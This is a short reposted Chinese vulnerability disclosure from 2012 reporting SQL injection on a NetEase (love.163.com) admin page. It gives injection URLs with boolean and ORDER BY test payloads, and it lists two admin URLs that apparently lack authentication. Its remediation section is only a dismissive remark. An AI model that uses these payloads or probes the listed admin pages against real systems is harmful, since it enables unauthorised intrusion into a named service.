网易某频道注入漏洞

2012-7-18 14:35:49 来源:网络转载 浏览:119
网易最新漏洞公开:网易某频道注入。

简要描述:
网易某频道注入+某频道疑拟后台没认证。

详细说明:
注入点:
http://love.163.com/admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20order%20by%204%23
正常:
http://love.163.com/admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=1%23
错误:
http://love.163.com/admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=2%23
可以用工具来猜,这里就不继续了。
疑拟后台没认证
http://tools.vip.163.com/business/dooland/admin/index.mx
http://count.mail.163.com/adclickrate/jsp/admin/generateTinyURL.jsp

漏洞证明:

网易某频道注入漏洞

【图一】

网易某频道注入漏洞

【图二】

修复方案:
应该懂!

(0)
(0)